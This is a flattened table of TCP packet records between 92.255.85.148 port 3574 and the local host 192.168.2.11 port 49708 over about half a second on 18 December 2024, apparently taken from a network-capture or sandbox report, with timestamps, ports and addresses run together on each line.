                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.891027927 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.891041040 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.891197920 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.892064095 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.892664909 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.893127918 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.893141031 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.893188000 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.893188000 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.895699978 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.895776033 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.895817041 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.895921946 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.895936012 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.896399021 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.896411896 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.896445036 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.896445036 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.897360086 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.897978067 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.898021936 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.898542881 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.899086952 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.899132967 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.899506092 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.900240898 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.900280952 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.900578022 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.900589943 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.900763035 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.901637077 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.901885033 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.902048111 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.902683973 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.902745008 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.903022051 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.903732061 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.904717922 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.904911041 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.904921055 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.904923916 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.905040979 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.905868053 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.906225920 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.906356096 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.906933069 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.907094002 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.907128096 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.907989025 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.908307076 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.908792973 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.909044027 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.909075975 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:15.909193993 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.103154898 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.103176117 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.103348017 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.103610039 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.103790045 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.103840113 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.104691982 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.104850054 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.104898930 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.105741024 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.106153011 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.106167078 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.106190920 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.107162952 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.107183933 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.107247114 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.108278990 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.108294010 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.108361006 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.109287024 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.109301090 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.109344959 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.110337019 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.110351086 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.110421896 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.111373901 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.111430883 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.112327099 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.112427950 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.112487078 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.112571001 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.113529921 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.113548040 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.113626003 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.114603996 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.114622116 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.114698887 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.115653038 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.115670919 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.115750074 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.116753101 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.116769075 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.116861105 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.117733955 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.117794991 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.118212938 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.118837118 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.118855000 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.118938923 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.119914055 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.119929075 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.120071888 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.121026993 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.121041059 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.121078014 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.122006893 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.122087002 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.122215986 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.123095036 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.123141050 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.123168945 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.124182940 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.124232054 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.124248028 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.125164032 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.125216007 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.125442982 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.126281977 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.126297951 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.126329899 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.127351999 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.127370119 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.127413988 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.128401995 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.128427029 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.128483057 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.129405022 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.129451990 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.129473925 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.130486965 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.130539894 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.130742073 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.131525993 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.131566048 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.131592035 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.132607937 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.132724047 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.132857084 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.133702993 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.133776903 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.133873940 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.134706020 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.134855032 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.134934902 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.135762930 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.135929108 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.135993958 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.136879921 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.136929035 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.137063026 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.137936115 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.137994051 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.138103962 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.138998032 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.139061928 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.139152050 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.140070915 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.140084028 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.140126944 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.141129017 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.141180038 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.141273975 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.142152071 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.142235994 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.142349005 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.143204927 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.143266916 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.143383980 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.144241095 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.144289017 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.144427061 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.145334005 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.145437956 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.145505905 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.146369934 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.146471977 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.146514893 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.147433043 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.147500992 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.147685051 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.148511887 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.148624897 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.148715019 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.149552107 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.149679899 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.149744987 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.150676966 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.150722980 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.150861979 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.151722908 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.151774883 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.151829958 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.152817011 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.152832985 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.152863026 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.153800964 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.153851032 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.153961897 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.154855013 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.154901028 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.154972076 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.155908108 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.155956984 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.156358004 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.156972885 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.157021046 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.157038927 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.158030033 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.158078909 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.158262014 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.197985888 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.295373917 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.295453072 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.295541048 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.296067953 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.296082973 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.296303034 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.296968937 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.297061920 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.297102928 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.298058987 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.298363924 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.298376083 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.298424006 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.299390078 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.299480915 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.299515009 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.300657034 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.300668955 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.301549911 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.301599026 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.301599026 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.301656008 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.302611113 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.302623034 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.302659035 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.303662062 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.303767920 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.303848028 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.304757118 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.304821014 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.305102110 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.305862904 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.305875063 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.305913925 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.306839943 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.306901932 CET497083574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.306909084 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.307861090 CET35744970892.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:16.307984114 CET35744970892.255.85.148192.168.2.11
